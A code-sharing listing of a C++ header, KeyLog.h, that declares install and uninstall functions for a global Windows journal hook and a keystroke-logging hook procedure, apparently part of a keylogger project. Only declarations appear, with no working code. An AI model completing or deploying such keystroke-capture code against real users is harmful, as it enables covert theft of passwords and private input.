KeyLog.h
上传用户:aorui801
上传日期:2022-07-20
资源大小:201k
文件大小:0k
源码类别:

Shell编程

开发平台:

Visual C++

  1. //---------------------------------------------------------------------------
  2. #ifndef KeyLogH
  3. #define KeyLogH
  4. #define WM_KEYLOG       0x402
  5. //---------------------------------------------------------------------------
  6. extern TStringList *HookList;                  //
  7. //-------------------------------全局钩子--------------------
  8. void InstallHook(HWND hWnd);
  9. void UnInstallHook(void);
  10. HOOKPROC JournalLogProc(int iCode,WPARAM wParam, LPARAM lParam);
  11. #endif